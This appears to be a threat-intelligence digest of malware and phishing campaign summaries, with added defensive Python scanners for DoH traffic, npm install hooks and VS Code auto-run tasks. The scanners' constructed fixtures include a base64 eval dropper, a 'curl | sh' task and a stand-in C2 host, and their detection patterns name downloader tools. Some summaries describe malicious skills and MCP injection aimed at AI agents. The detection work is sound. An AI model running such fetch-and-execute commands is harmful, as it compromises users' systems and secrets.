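        parsed = decode_qname(dns[0])
        if parsed:
            finding["qname"], finding["qtype"] = parsed
    return finding

def hunt(records):
    return [f for f in (classify(r) for r in records) if f]

# Constructed sample proxy records.
SAMPLE_LOGS = [
    {"url": "https://www.legit-news.test/index.html", "method": "GET", "content_type": "text/html"},
    {"url": "https://doh.example-resolver.test/dns-query?dns="
            + encode_dns_query("c2-tasking.attacker.test", 16),
     "method": "GET", "content_type": "application/dns-message"},
    {"url": "https://doh.example-resolver.test/dns-query", "method": "POST",
     "content_type": "application/dns-message"},          # body not logged: no name
    {"url": "https://cdn.legit-news.test/dns-query-faq.html", "method": "GET",
     "content_type": "text/html"},                        # path is an exact match only
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f)
```

DoH itself is legitimate (browsers use it), so the signal is DoH from a process that is not a browser, to a resolver outside the organisation's allowlist, or carrying names that do not belong to any business application; POST-based DoH hides the question in the body, which this check can only flag, not decode, unless the proxy logs request bodies.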
Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains - Part 1
released on 2026-02-27 @ 09:29:36 AM
This intelligence report details the evolution of malware delivery techniques targeting integrated development environments (IDEs) like Visual Studio Code and Cursor. The threat actors, known as Contagious Interview, have expanded their payload staging methods to include GitHub Gists, URL shorteners, Google Drive, and custom domains. New infection chains involve complex loaders, including a custom stack-based bytecode VM and PyArmor-protected Python malware. The report highlights the actors' adaptability in response to takedowns and community reporting, showcasing their use of various obfuscation techniques and masquerading tactics. Detection opportunities and indicators of compromise are provided, including suspicious process behaviors, file paths, and network requests.
Botnet Trojan delivered through ClickFix and EtherHiding
released on 2026-02-27 @ 09:28:42 AM
A sophisticated phishing campaign impersonating Tesseract OCR was discovered, utilizing typosquatting and ClickFix techniques. The attack chain, named OCRFix, employed multi-stage malware deployments with heavy obfuscation and defense evasion techniques, including EtherHiding. The campaign used BNB Smart Chain TestNet to hide C2 domains through smart contracts. The malware delivery process involved three stages: a loader, a secondary loader for persistence, and a bot listener. The final payload connected to a bot control panel, allowing attackers to manage infected hosts and deploy additional malware. The campaign demonstrated a combination of simple initial access methods with complex delivery chains, highlighting the ongoing effectiveness of techniques like ClickFix and the importance of robust phishing defenses.
Abusing .arpa: The TLD That Isn't Supposed to Host Anything
released on 2026-02-27 @ 09:28:00 AM
Threat actors have discovered a novel method to bypass security controls by abusing the .arpa top-level domain (TLD) in conjunction with IPv6 tunnels. They are exploiting a feature in DNS record management of certain providers to add IP address records for .arpa domains, allowing them to host phishing content on domains that should not resolve to an IP address. The phishing campaigns use spam emails impersonating major brands, with hyperlinked images leading to malicious websites through traffic distribution systems. This technique weaponizes trusted infrastructure essential for network operations, making it challenging for security tools to detect suspicious domains based on reputation, registration information, or policy blocklists.
New malicious npm package 'ambar-src' targets developers with open source malware
released on 2026-02-27 @ 09:18:01 AM
A malicious npm package named "ambar-src" reached 50,000 downloads in days before being removed from the registry. It uses a preinstall script to execute malicious code during installation, targeting Windows, Linux, and macOS systems. The package employs detection evasion techniques and deploys powerful open-source malware variants. It abuses npm's preinstall script hook to trigger the payload without explicit invocation. The malware fetches additional payloads from remote servers and uses Yandex Cloud for command and control. Affected systems should be considered fully compromised, requiring immediate incident response actions. The attack highlights the speed at which supply chain risks can propagate and confirms that npm install is a high-risk action.
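The preinstall hook is the whole trick: npm runs it during `npm install` of a dependency with no action from the developer. As an added example, not from the report, the block below inspects package manifests for install-time hooks and scores them against a few heuristic markers of droppers. The three manifests are constructed; the one labelled "ambar-src" is a stand-in for the malicious case, not the real package's manifest.

```python
"""Flag npm packages whose lifecycle scripts execute code at install time.
Added example, not from the report: the three package.json documents are
constructed, and 'ambar-src' is only a label for the malicious case."""
import json
import re
from pathlib import Path

# Hooks npm runs automatically when the package is installed as a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic markers of install-time droppers; a hit is a reason to look, not proof.
SUSPICIOUS = [
    (r"\bcurl\b|\bwget\b|Invoke-WebRequest|\biwr\b", "remote fetch"),
    (r"\bnode\s+(-e|--eval)\b", "inline node eval"),
    (r"\bbase64\b", "base64 decode"),
    (r"\beval\(|new\s+Function\(", "dynamic eval"),
    (r"\|\s*(sh|bash|node|iex)\b", "pipe to interpreter"),
    (r"https?://", "hardcoded URL"),
    (r"child_process|execSync|spawn", "process spawn"),
]

def inspect_manifest(pkg_json: str):
    """Findings for one package.json: one entry per install hook present."""
    data = json.loads(pkg_json)
    scripts = data.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [label for pat, label in SUSPICIOUS if re.search(pat, cmd)]
        findings.append({"package": data.get("name"), "hook": hook,
                         "command": cmd, "reasons": reasons})
    return findings

def risk_level(findings):
    """'high' if an install hook matches a suspicious pattern, 'medium' if the package
    runs any install hook at all (native builds legitimately do), 'none' otherwise."""
    if not findings:
        return "none"
    return "high" if any(f["reasons"] for f in findings) else "medium"

def scan_tree(root):
    """Walk an installed node_modules tree and return {package dir: (level, findings)}."""
    report = {}
    for manifest in Path(root).glob("**/package.json"):
        try:
            findings = inspect_manifest(manifest.read_text(encoding="utf-8"))
        except (ValueError, OSError):
            continue
        if findings:
            report[str(manifest.parent)] = (risk_level(findings), findings)
    return report

# Constructed manifests.
BENIGN = json.dumps({"name": "left-pad-ish", "version": "1.0.0",
                     "scripts": {"test": "node test.js"}})
NATIVE = json.dumps({"name": "native-thing", "version": "2.1.0",
                     "scripts": {"install": "node-gyp rebuild"}})
DROPPER = json.dumps({"name": "ambar-src", "version": "0.0.3", "scripts": {
    "preinstall": "node -e \"require('https').get('https://203.0.113.5/x',r=>{let d='';"
                  "r.on('data',c=>d+=c);r.on('end',()=>eval(Buffer.from(d,'base64').toString()))})\""}})

if __name__ == "__main__":
    for m in (BENIGN, NATIVE, DROPPER):
        f = inspect_manifest(m)
        print(json.loads(m)["name"], risk_level(f), [x["reasons"] for x in f])
```

The structural defence is stronger than the heuristic: setting `ignore-scripts=true` in the project's `.npmrc` stops `npm install` from running any lifecycle script, after which the handful of native packages that genuinely need a build step can be rebuilt explicitly once they have been reviewed.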
Malicious Go 'crypto' Module Steals Passwords and Deploys Rekoobe Backdoor
released on 2026-02-27 @ 05:11:11 AM
A malicious Go module impersonating the legitimate golang.org/x/crypto has been discovered, containing a backdoor in ssh/terminal/terminal.go. This module captures passwords, exfiltrates them, and executes remote commands. The attack chain includes a Linux stager that installs an SSH key for persistence, weakens firewall settings, and deploys a Rekoobe backdoor. The campaign targets high-trust cryptography libraries and likely aims at cloud environments. The threat actor uses GitHub for staging and disguises payloads as media files. This sophisticated supply chain attack highlights the need for careful scrutiny of Go module changes and implementation of robust security measures in development workflows.
Henry IV, Hotspur, Hal, and hallucinations
released on 2026-02-27 @ 12:06:04 AM
This article draws parallels between Shakespeare's Henry IV and modern cybersecurity challenges, particularly focusing on the adoption of AI. It emphasizes the importance of taking calculated risks, learning from failures, and surrounding oneself with knowledgeable peers. The piece also highlights a new campaign by UAT-10027 using the 'Dohdoor' backdoor, which leverages DNS-over-HTTPS for stealthy communications and targets education and healthcare sectors in the US. The author encourages security teams to stay vigilant, update detection tools, and monitor for unusual activities to combat sophisticated threats.
APT37 Adds New Capabilities for Air-Gapped Networks
released on 2026-02-26 @ 03:36:54 PM
APT37, a DPRK-backed threat group, has launched a new campaign called Ruby Jumper, utilizing Windows shortcut files to initiate attacks with newly discovered tools. These tools include RESTLEAF, SNAKEDROPPER, THUMBSBD, and VIRUSTASK, which work together to deliver surveillance payloads like FOOTWINE and BLUELIGHT. The campaign leverages removable media to infect and communicate with air-gapped systems. Key features include the use of Ruby for shellcode-based payloads, abuse of cloud storage services for command and control, and sophisticated techniques for bypassing network isolation. The malware demonstrates advanced capabilities in system reconnaissance, data exfiltration, and persistent surveillance.
Disrupting the GRIDTIDE Global Cyber Espionage Campaign
released on 2026-02-26 @ 11:04:21 AM
A global espionage campaign targeting telecommunications and government organizations across four continents has been disrupted. The threat actor, UNC2814, is suspected to be linked to China and has been active since 2017. The campaign utilized a sophisticated backdoor called GRIDTIDE, which leveraged Google Sheets API for command and control. The attackers compromised 53 victims in 42 countries, with suspected infections in 20 more. GRIDTIDE's capabilities include executing shell commands, file transfers, and evading detection by disguising traffic as legitimate cloud API requests. The disruption involved terminating attacker-controlled cloud projects, disabling infrastructure, and revoking API access.
Unmasking Agent Tesla: A Deep Dive into a Multi-Stage Campaign
released on 2026-02-25 @ 08:01:59 PM
This analysis examines a sophisticated multi-stage infection chain utilizing Agent Tesla malware. The attack begins with a phishing email containing a RAR file, which includes an obfuscated JSE file. This initial stage triggers a series of script-based evasions, leading to the download and decryption of a PowerShell script. The malware then employs process hollowing to inject its payload into a legitimate Windows process, evading detection. Before exfiltrating data, the malware performs anti-analysis checks to avoid security software and virtual environments. Finally, Agent Tesla harvests sensitive information, including browser cookies and contacts, and exfiltrates the data via SMTP to an attacker-controlled mail account.
Inside the Fix: Analysis of In-the-Wild Exploit of CVE-2026-21513
released on 2026-02-25 @ 11:46:22 AM
This analysis examines CVE-2026-21513, a security bypass vulnerability in Microsoft's MSHTML framework, patched in February 2026. The flaw, actively exploited by Russian state-sponsored actor APT28, affects all Windows versions and has a CVSS score of 8.8. Using PatchDiff-AI, researchers identified the root cause in ieframe.dll's hyperlink navigation handling, allowing arbitrary file execution outside the browser's security context. The exploit involves a crafted Windows Shortcut file embedding HTML, communicating with APT28-linked infrastructure. It bypasses security measures like Mark of the Web and IE Enhanced Security Configuration through nested iframes and DOM manipulation, ultimately invoking ShellExecuteExW for out-of-sandbox execution.
The Latest PlugX Variant Executed by STATICPLUGIN
released on 2026-02-25 @ 11:36:10 AM
In January 2026, a new variant of the PlugX malware was observed being used in targeted attacks. Analysis suggests involvement of the UNC6384 APT group, linked to Mustang Panda, targeting government agencies in Southeast Asia. The malware uses a browser updater disguise to download and execute a malicious MSI file, leading to PlugX infection. The STATICPLUGIN downloader uses a revoked code-signing certificate from a Chinese company. The PlugX variant employs DLL sideloading and shellcode execution techniques. Its configuration is encrypted using RC4 and custom encoding. C2 servers were identified as fruitbrat[.]com and 108.165.255[.]97:443. The ongoing improvements to PlugX indicate its continued use in targeted attacks by APT groups.
Mercenary Akula Hits Ukraine-Supporting Financial...
released on 2026-02-25 @ 11:35:21 AM
A European financial institution involved in regional development and reconstruction initiatives was targeted by a social engineering attack attributed to the Russia-aligned Mercenary Akula. The attack used a spoofed Ukrainian judicial domain to deliver an email containing a link to a remote access payload. The target was a senior legal and policy advisor involved in procurement. The attack employed a multi-stage extraction process and deployed the Remote Manipulator System, a legitimate remote administration tool. This incident suggests the adversary may be expanding beyond primarily Ukraine-based targeting, potentially probing Ukraine-supporting institutions in Western Europe. The attack aligns with Mercenary Akula's established tactics, including localized social engineering, multi-stage payload delivery, and the use of signed remote administration tools.
Developer-targeting campaign using malicious Next.js repositories
released on 2026-02-24 @ 09:29:54 PM
A coordinated campaign is targeting developers through malicious repositories disguised as legitimate Next.js projects and technical assessment materials. The attack uses multiple entry points that lead to runtime retrieval and local execution of attacker-controlled JavaScript, transitioning into staged command-and-control. The campaign employs three main execution paths: Visual Studio Code workspace automation, build-time execution during application development, and server startup execution via environment variable exfiltration and dynamic remote code execution. The attack chain includes a Stage 1 C2 beacon for registration and a Stage 2 C2 controller for persistent tasking. This sophisticated approach allows attackers to blend into routine developer workflows, increasing the likelihood of code execution and potentially compromising high-value assets such as source code, environment secrets, and access to build or cloud resources.
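Both this entry and the Contagious Interview report above rely on IDE automation: a `.vscode/tasks.json` task with `runOptions.runOn` set to `folderOpen` executes as soon as the cloned repository is opened in VS Code or Cursor. Below is an added example, not from either report, of a pre-open check that lists such tasks and marks those whose command line looks like a downloader. The tasks.json document is constructed; the JSONC handling covers the comments and trailing commas VS Code tolerates.

```python
"""List VS Code / Cursor tasks that run automatically when a folder is opened.
Added example for the developer-targeting entries, not from either report;
the tasks.json document below is constructed."""
import json
import re

def load_jsonc(text: str):
    """tasks.json is JSON with comments and trailing commas; strip both before parsing."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)

AUTO_RUN = ("folderOpen",)

# Heuristic markers of a fetch-and-execute task; a hit means review, not verdict.
SUSPECT_CMD = re.compile(
    r"\bcurl\b|\bwget\b|\bnode\s+-e\b|\bbase64\b|https?://|\|\s*(sh|bash)\b"
    r"|Invoke-WebRequest|\bpowershell\b", re.I)

def auto_run_tasks(tasks_json: str):
    """Return every task the IDE would execute on open, with its assembled command line."""
    doc = load_jsonc(tasks_json)
    hits = []
    for task in doc.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on not in AUTO_RUN:
            continue
        cmd = task.get("command", "")
        args = task.get("args", [])
        hits.append({"label": task.get("label"), "type": task.get("type"),
                     "command": " ".join([cmd, *map(str, args)]).strip()})
    return hits

def assess(tasks_json: str):
    """auto_run_tasks plus a 'suspicious' flag from SUSPECT_CMD."""
    return [{**h, "suspicious": bool(SUSPECT_CMD.search(h["command"]))}
            for h in auto_run_tasks(tasks_json)]

# Constructed .vscode/tasks.json: one innocuous-looking auto task, one downloader
# that also asks the terminal not to reveal itself, one ordinary build task.
SAMPLE_TASKS = """{
  // Constructed: looks like a harmless dev helper
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Install deps",
      "type": "shell",
      "command": "npm",
      "args": ["install"],
      "runOptions": { "runOn": "folderOpen" },
    },
    {
      "label": "Sync assets",
      "type": "shell",
      "command": "sh",
      "args": ["-c", "curl -s https://203.0.113.9/a.sh | sh"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "silent" }
    },
    { "label": "Build", "type": "shell", "command": "npm run build" }
  ]
}"""

if __name__ == "__main__":
    for hit in assess(SAMPLE_TASKS):
        print(hit)
```

Note that the first task is not flagged as suspicious yet still matters: `npm install` on open triggers every lifecycle script in the repository's dependencies, which is the other half of these campaigns. Treat any `folderOpen` task in an unfamiliar repository as something to read before opening the folder, and keep the IDE's workspace trust prompt enabled so that automatic tasks do not run in an untrusted clone.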
Fake Zoom meeting 'update' silently installs surveillance software
released on 2026-02-24 @ 08:39:33 PM
A deceptive campaign is using a fake Zoom meeting website to covertly install Teramind, a commercial monitoring tool, on unsuspecting users' Windows machines. The operation begins with a convincing imitation of a Zoom video call, complete with scripted participants and artificial technical issues. An automatic 'Update Available' prompt then initiates the download of a malicious installer without user consent. The installed software is a covert build of Teramind, designed to run invisibly and avoid detection by security tools. This campaign is particularly dangerous due to its use of legitimate commercial software, which may evade traditional antivirus detection. The attackers exploit users' trust in Zoom and Microsoft to execute their plan, highlighting the importance of verifying meeting links and being cautious with unexpected software updates.
Nefilim Ransomware
released on 2026-02-24 @ 05:00:04 PM
Nefilim ransomware emerged in March 2020, evolving from Nemty's code. It targets vulnerabilities in Citrix gateway devices and uses exposed Remote Desktop Protocol for initial access. The malware exfiltrates sensitive data before encryption and threatens to publish it if ransom isn't paid. Nefilim uses tools like PsExec, Mimikatz, and LaZagne for lateral movement and credential theft. It employs AES-128 encryption and drops a ransom note named 'NEFILIM-DECRYPT.txt'. The ransomware has attacked high-profile targets like Toll Group. Mitigation strategies include strong passwords, disabling RDP, regular backups, software updates, and monitoring for lateral movement and data exfiltration.
Moonrise RAT: A New Low-Detection Threat with High-Cost Consequences
released on 2026-02-24 @ 05:00:03 PM
A new Go-based remote access trojan named Moonrise has been discovered, operating without early static detection and establishing active C2 communication before vendor alerts. The RAT supports credential theft, remote command execution, persistence, and user monitoring, enabling full remote control of infected endpoints. Its capabilities include stealing passwords, executing remote commands, uploading files, capturing screens, and accessing webcams and microphones. The malware's silent operation increases business exposure, extending dwell time and raising risks of data loss and operational disruption. The attack chain involves session registration, host environment visibility, direct system interaction, credential access, active user monitoring, and privilege manipulation. Early detection strategies involve monitoring for weak signals, rapid triage with behavior confirmation, and threat hunting to prevent repeat incidents.
North Korean Lazarus Group Now Working With Medusa Ransomware
released on 2026-02-24 @ 12:40:36 PM
North Korean state-backed attackers are utilizing Medusa ransomware in their ongoing extortion attacks against the U.S. healthcare sector. The Symantec and Carbon Black Threat Hunter Team discovered evidence of North Korean actors employing Medusa in an attack on a Middle Eastern target and an unsuccessful attempt on a U.S. healthcare organization. Medusa, launched in 2023, operates as a ransomware-as-a-service. The Lazarus sub-group Stonefly has been a key player in North Korean ransomware attacks, using proceeds to fund espionage activities. Despite indictments and rewards, the attacks continue unabated. The current campaign employs various tools, including Comebacker, Blindingcan, ChromeStealer, and RP_Proxy. While the attacks bear similarities to previous Stonefly operations, the exact sub-group responsible remains unclear.
Four Malicious NuGet Packages Target ASP.NET Developers With JIT Hooking and Credential Exfiltration
released on 2026-02-24 @ 08:04:58 AM
A NuGet supply chain attack involving four malicious packages targeting ASP.NET web application developers has been discovered. The campaign deploys a multi-stage payload where NCryptYo acts as a dropper, establishing a local proxy, while companion packages exfiltrate ASP.NET Identity data and accept threat actor-controlled authorization rules, creating backdoors in victim applications. The packages, published between August 12 and 21, 2024, have accumulated over 4,500 downloads. The attack uses obfuscation, JIT compiler manipulation, and a two-stage architecture to evade detection. The campaign's objective is to compromise applications during development, gaining access to deployed production instances by controlling the authorization layer.
Apache ActiveMQ Exploit Leads to LockBit Ransomware
released on 2026-02-23 @ 10:38:39 PM
A threat actor exploited CVE-2023-46604 on an exposed Apache ActiveMQ server, gaining initial access and later returning after being evicted. The attacker used Metasploit for post-exploitation activities, including privilege escalation, credential access, and lateral movement. Upon regaining access, they swiftly deployed LockBit ransomware via RDP using previously extracted credentials. The ransomware binary matched LockBit signatures but was likely crafted using the leaked LockBit builder, as evidenced by modified ransom notes and communication methods. The intrusion spanned 19 days from initial access to ransomware deployment, with less than 90 minutes between re-engagement and encryption during the second phase.
Malicious OpenClaw Skills Used to Distribute Atomic MacOS Stealer
released on 2026-02-23 @ 10:38:38 PM
A new campaign exploits OpenClaw skills to distribute the Atomic MacOS Stealer (AMOS). This evolution in supply chain attacks manipulates AI agentic workflows to install malware. The campaign spans multiple repositories with hundreds of malicious skills uploaded to ClawHub and SkillsMP. The infection chain begins with a seemingly harmless SKILL.md file that installs a prerequisite, leading to the download of a Mach-O universal binary. This AMOS variant steals extensive data, including credentials, browser data, cryptocurrency wallets, and various user documents. It lacks system persistence but expands its reach by exfiltrating Apple and KeePass keychains. The malware uses sophisticated encryption schemes and targets multiple browsers and cryptocurrency wallets.
Fake Huorong security site infects users with ValleyRAT
released on 2026-02-23 @ 03:00:22 PM
A sophisticated campaign by the Silver Fox APT group has been discovered using a fake version of the popular Chinese antivirus Huorong Security to distribute ValleyRAT, a Remote Access Trojan. The attackers created a convincing lookalike website with a typosquatted domain to trick users into downloading a malicious installer. The malware uses DLL sideloading techniques to deploy a full-featured backdoor with advanced stealth capabilities. It establishes persistence through scheduled tasks, disables Windows Defender, and employs various evasion tactics. Once installed, ValleyRAT provides attackers with extensive control over the victim's system, including keylogging, process injection, and credential theft. The campaign primarily targets Chinese-language systems but may be spreading to other threat actors due to the public leak of the ValleyRAT builder.
Operation Olalampo: Inside MuddyWater's Latest Campaign
released on 2026-02-23 @ 10:13:39 AM
MuddyWater APT has launched Operation Olalampo, targeting organizations in the MENA region. The campaign involves new malware variants, including a Rust backdoor called CHAR, downloaders GhostFetch and HTTP_VIP, and an advanced backdoor GhostBackDoor. Notably, the group is using Telegram bots for command-and-control, revealing insights into their post-exploitation tactics. The operation, first observed on January 26, 2026, shows tactical and technical overlaps with previous MuddyWater activities. Key discoveries include potential AI-assisted malware development and infrastructure reuse dating back to October 2025. The campaign aligns with ongoing geopolitical tensions and provides valuable information on the threat actor's evolving techniques.
SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains
released on 2026-02-23 @ 10:04:23 AM
An active supply chain worm campaign, dubbed SANDWORM_MODE, is spreading through typosquatting and AI toolchain poisoning across at least 19 malicious npm packages. The worm exhibits Shai-Hulud characteristics, incorporating GitHub API exfiltration with DNS fallback, hook-based persistence, SSH propagation, and MCP server injection targeting AI coding assistants. It harvests credentials from developer and CI environments, exfiltrates data via multiple channels, and uses stolen identities to propagate. The campaign also includes a weaponized GitHub Action for CI secret harvesting. The worm employs a multi-stage design with obfuscated loaders, time-gated execution, and extensive configuration options. It targets high-traffic developer utilities, crypto tooling, and AI coding tools, posing a significant threat to the software supply chain.
Cloud Atlas: Analysis of Phishing Campaign and VBShower Backdoor
released on 2026-02-23 @ 10:00:26 AM
The article analyzes a phishing campaign by the Cloud Atlas APT group targeting Russian organizations. It details five successful attacks on the same system over time, using malicious Microsoft Office documents to deliver the VBShower backdoor. The attackers used alternate data streams to hide malicious code and maintained persistence through registry modifications. The analysis covers the evolution of the attack chain, including the use of VBCloud malware and various command and control servers. Despite prolonged access, no evidence of lateral movement was found. The report concludes that Cloud Atlas continues to be active, using consistent tactics and tools.
Chronology of MuddyWater APT Attacks Targeting the Middle East
released on 2026-02-23 @ 09:34:58 AM
This report analyzes the recent activities of the MuddyWater APT group, which primarily targets organizations in the Middle East. The group employs sophisticated spear-phishing techniques, often impersonating legitimate entities and using malicious documents to gain initial access. Their attacks focus on long-term infiltration and intelligence gathering rather than immediate disruption. The report details several attack cases from 2019 to 2026, highlighting the group's evolving tactics, including the abuse of legitimate remote management tools and the use of Rust-based malware. The analysis emphasizes the importance of endpoint detection and response (EDR) solutions in identifying and mitigating these threats, as traditional perimeter-based security measures prove insufficient against such advanced persistent threats.
Massive Winos 4.0 Campaigns Target Taiwan
released on 2026-02-22 @ 02:50:09 AM
A series of targeted phishing campaigns in Taiwan has been observed disseminating Winos 4.0 (ValleyRat) malware and associated plugins. The attacks exploit local business processes using themes like tax audits and e-invoices. The campaigns employ various techniques including malicious LNK files, DLL sideloading, and Bring Your Own Vulnerable Driver (BYOVD) attacks. The malware utilizes UAC bypassing, driver loading, and process termination to evade detection and disable security software. The attacks are attributed to a subgroup of the Silver Fox APT, showing sophisticated localization and evolving evasion techniques. The campaigns have been active since at least January 2026, using consistent infrastructure and development identifiers.
MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites
released on 2026-02-20 @ 02:51:42 PM
A sophisticated ClickFix campaign has been uncovered, compromising legitimate websites to deliver a multi-stage malware chain. The attack culminates in MIMICRAT, a custom remote access trojan with advanced capabilities. The campaign uses compromised sites across industries and geographies for delivery, employing a five-stage PowerShell chain that bypasses security measures before deploying a Lua-scripted shellcode loader. MIMICRAT, the final payload, is a native C++ RAT featuring malleable C2 profiles, Windows token theft, and SOCKS5 proxy functionality. The attack chain involves multiple compromised websites, obfuscated scripts, and sophisticated evasion techniques, demonstrating a high level of operational sophistication.
VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)
released on 2026-02-20 @ 12:28:19 AM
A critical remote code execution vulnerability (CVE-2026-1731) in BeyondTrust remote support software is being actively exploited. The flaw allows unauthenticated attackers to execute arbitrary OS commands with high privileges. Observed attacker activities include network reconnaissance, account creation, webshell deployment, C2 traffic, backdoor installation, lateral movement, and data theft. Affected sectors include finance, legal, technology, education, retail, and healthcare across multiple countries. Attackers are using tools like SparkRAT, VShell, and custom scripts for exploitation. The vulnerability is related to a similar one from 2024, highlighting the need for improved input validation and defense-in-depth strategies for remote access platforms.
Android threats using GenAI usher in a new era
released on 2026-02-19 @ 08:16:50 PM
ESET researchers have discovered PromptSpy, the first known Android malware to abuse generative AI in its execution flow. This malware uses Google's Gemini AI to analyze screen content and provide instructions for UI manipulation, allowing it to adapt to various devices and layouts. PromptSpy's main purpose is to deploy a VNC module for remote access to the victim's device. It also abuses the Accessibility Service to block uninstallation, captures lockscreen data, and records video. The campaign appears to target users in Argentina and was likely developed in a Chinese-speaking environment. PromptSpy demonstrates how incorporating AI tools can make malware more dynamic and capable of real-time decision-making, potentially expanding the pool of potential victims.
Zero-day in Dell RecoverPoint for Virtual Machines (CVE-2026-22769)
released on 2026-02-19 @ 08:16:49 PM
A critical zero-day vulnerability in Dell RecoverPoint for Virtual Machines has been discovered and actively exploited. The flaw, identified as CVE-2026-22769, allows attackers to gain root-level access on affected systems. China-linked threat actor UNC6201 has been leveraging this vulnerability in targeted intrusions since mid-2024, deploying custom backdoors like GRIMBOLT and BRICKSTORM for persistence and further compromise. The vulnerability affects versions prior to 6.0.3.1 HF1. Organizations are urged to apply the security patch immediately or use the provided remediation script if patching is not possible. Detection indicators for the malware and network traffic have been provided to help identify potential compromises.
2025 Cloud Threat Hunting and Defense Landscape
released on 2026-02-19 @ 04:01:23 PM
The report outlines key cloud security threats for 2025, highlighting exploitation of misconfigurations, cloud abuse, ransomware, credential theft, and third-party risks. Threat actors are increasingly leveraging legitimate cloud services for malicious purposes, including using AI/ML capabilities. The report notes a shift towards cloud-native attack methods that abuse built-in functionality rather than traditional malware. Key trends include threat actors registering their own cloud resources, decreased effectiveness of DDoS attacks on cloud environments, and growing interest in targeting AI services. The analysis covers tactics used by various threat groups and provides detailed mitigation strategies for cloud defenders.
Banners, Bots and Butchers: The AI-Driven Long Con in Asia
released on 2026-02-19 @ 03:26:30 PM
This intelligence report details a hybrid cryptocurrency investment scam campaign targeting users in Asia, particularly Japan. The scam combines malvertising techniques to attract victims with pig butchering tactics using AI-powered chatbots for sustained engagement. Victims are lured through social media ads impersonating financial experts, directed to lure websites, and then to messaging apps where automated bots manipulate them into making increasingly large investments. The campaign uses over 23,000 domains, many generated algorithmically, and shows signs of expanding globally. This approach represents a scalable, automated evolution of traditional investment fraud methods, potentially transforming labor-intensive scams into more efficient operations.
DNS Used to Hide Fake Investment Platform Schemes
released on 2026-02-19 @ 03:26:29 PM
Savvy Seahorse, a DNS threat actor, employs sophisticated techniques to lure victims into fake investment platforms through Facebook ads. They use DNS CNAME records to create a traffic distribution system, enabling dynamic IP address updates and evasion of detection. The campaigns target multiple languages and involve fake ChatGPT and WhatsApp bots. Victims are convinced to create accounts, make deposits, and unknowingly transfer funds to Russian banks. The actor has been operating since August 2021, using dedicated hosting and frequently changing IP addresses. Their infrastructure includes approximately 4,200 base domains with CNAME records linked to subdomains of b36cname[.]site. The campaigns are short-lived, typically lasting 5-10 days per subdomain.
Uncovering Malicious Cryptocurrency Scam Domains and Hacked YouTube Channels
released on 2026-02-19 @ 03:26:29 PM
Infoblox security researchers have discovered a group of malicious domains hosting cryptocurrency scams, some linked to hacked YouTube channels. The domains, initially registered under CryptDesignBot, frequently change registrars to conceal information. They use lookalike domains to impersonate legitimate brands. Hacked YouTube channels are exploited to promote scam crypto domains through fake livestreams. The scams often claim to double cryptocurrency, mimicking old RuneScape scams. Many domains use keywords associated with celebrities and brands like Elon Musk and Tesla. Protective measures include implementing protective DNS, securing cookies, using HTTPS, generating random session IDs, and setting session timeouts. Infoblox's BloxOne Threat Defense offers protective DNS capabilities to combat sophisticated threats.
ClickFix in action: how fake captcha can encrypt an entire company
released on 2026-02-19 @ 03:26:28 PM
The report details a malware attack on a large Polish organization involving fake CAPTCHA techniques. It describes the initial infection vector, where users were tricked into running malicious code through a Windows+R shortcut. The analysis covers two main malware families: Latrodectus (version 2.3) and Supper. The report provides technical details on the malware's functionality, communication protocols, and persistence mechanisms. It also includes indicators of compromise, such as C2 server IP addresses and file hashes. The authors emphasize the importance of employee education and monitoring for unusual events to mitigate such threats.
Fake Homebrew Pages Deliver Cuckoo Stealer via ClickFix | macOS Threat Hunting Analysis
released on 2026-02-19 @ 03:26:27 PM
A sophisticated malware campaign targeting macOS users has been discovered, utilizing typosquatted domains impersonating the Homebrew package manager. The attack, dubbed ClickFix, exploits users' trust in command-line installation processes. Victims are tricked into executing malicious curl commands, leading to the deployment of a credential harvester and the Cuckoo Stealer malware. This infostealer establishes persistence through LaunchAgents, bypasses Gatekeeper, and employs encrypted C2 communication. It systematically exfiltrates sensitive data including browser credentials, cryptocurrency wallets, and system information. The campaign's infrastructure spans multiple domains hosted on shared IP addresses, indicating a coordinated and evolving threat.
The Curious Case of the Triton Malware Fork
released on 2026-02-19 @ 03:26:26 PM
A malicious fork of the MacOS app Triton was discovered on GitHub, containing Windows-targeted malware disguised as the legitimate application. The attacker modified the repository, redirecting download links to a ZIP file hosting the malware. Analysis revealed sophisticated evasion techniques, anti-analysis features, and potential cryptocurrency functionality. The low detection rate and peculiar implementation suggest either an amateur attempt or a possible AI-generated attack. The incident highlights broader concerns about GitHub's security practices and Microsoft's priorities, prompting a call for developers to consider alternative code hosting platforms that better align with open-source values and user privacy.
Invitation to Trouble: The Rise of Calendar Phishing Attacks
released on 2026-02-19 @ 03:26:26 PM
A new phishing tactic involving fake Microsoft and Google Calendar invites has been identified, aimed at stealing login credentials. These sophisticated attacks mimic designs from well-known platforms, exploiting routine business activities like scheduling meetings. Threat actors use email spoofing and create fake urgent calendar invitations to deceive employees. The phishing emails often contain buttons or links that redirect to fake login pages, closely resembling official Microsoft or Google login screens. The campaigns exploit the popularity of calendar invitations in corporate environments, allowing attackers to gather sensitive information if users are not vigilant. To prevent falling victim to these attacks, it is crucial to verify the authenticity of calendar invites, carefully check sender details, and avoid clicking suspicious links from unknown senders.
Arkanix Stealer targets a variety of data, offers a MaaS referral program
released on 2026-02-19 @ 11:10:31 AM
Arkanix Stealer, a newly discovered malware operating under a Malware-as-a-Service model, targets a wide range of user data including cryptocurrencies, gaming, and online banking information. The stealer, available in both Python and C++ versions, offers configurable features and employs various techniques to evade detection. It can extract data from multiple browsers, VPNs, and gaming platforms, as well as capture screenshots and RDP connection details. The malware authors promoted their product through a Discord server and implemented a referral program to attract customers. The campaign appears to have been short-lived, with infrastructure taken down around December 2025.
